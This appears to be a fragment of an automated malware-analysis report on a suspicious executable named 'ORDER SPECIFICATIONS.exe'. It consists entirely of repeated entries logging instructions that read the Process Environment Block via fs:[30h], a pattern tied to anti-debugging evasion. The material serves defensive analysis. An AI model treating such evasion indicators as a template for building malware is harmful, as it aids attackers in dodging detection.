            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0155B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0155B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0155B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0155B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0155B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C58EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C40E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C40E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C40E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01543884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01543884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FF0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015090AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01598B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015453CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015453CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014EDBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0157D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F2397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FB390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01595BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01554257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0150927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0157B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0157B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01598A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C5210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01504A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01504A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F2ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F2AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014DAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014DAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FFAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01503D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01543540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01573D40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E7D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014EC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014EC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0154A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01598D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01546DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01546DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01546DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01546DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01546DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01546DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01578DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014DD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014DD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F35A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015905AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015905AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FA44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0155C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0155C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0159740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0159740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0159740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01546C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01546C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01546C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01546C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FBC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01598CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015814FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01546CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01546CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01546CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014DEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014DFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01598F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0155FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0155FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0159070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0159070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014EF716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FE730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015037F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01547794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01547794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01547794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014EAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014EAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014EAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014EAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014EAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F8E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01581608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0157FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F36CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01598ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0157FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01508EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F16E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0155FE87 mov eax, dword ptr fs:[00000030h]
